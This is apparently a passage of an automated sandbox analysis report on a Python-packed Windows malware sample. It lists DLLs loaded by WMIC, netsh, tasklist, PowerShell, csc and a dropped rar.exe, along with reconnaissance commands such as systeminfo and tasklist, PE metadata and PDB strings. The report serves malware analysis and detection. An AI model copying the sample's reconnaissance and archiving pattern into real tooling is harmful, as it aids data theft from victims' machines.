              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\tasklist.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: Image base 0x140000000 > 0x60000000
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static file information: File size 7266369 > 1048576
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.pdbhP source: powershell.exe, 0000002D.00000002.1546305256.0000014D0A895000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1770892655.00007FF8E7290000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1771559023.00007FF8E7316000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1769130422.00007FF8E6D1F000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1u 30 May 2023built on: Wed May 31 23:27:41 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1769130422.00007FF8E6D1F000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: 6C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.pdb source: powershell.exe, 0000002D.00000002.1546305256.0000014D0A895000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1323859878.00000162E1226000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1777638833.00007FF8F9D71000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1323859878.00000162E1226000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1777638833.00007FF8F9D71000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1769130422.00007FF8E6DA1000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000048.00000000.1631513880.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp, rar.exe.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1774041313.00007FF8E795B000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1771559023.00007FF8E7316000.00000040.00000001.01000000.00000010.sdmp
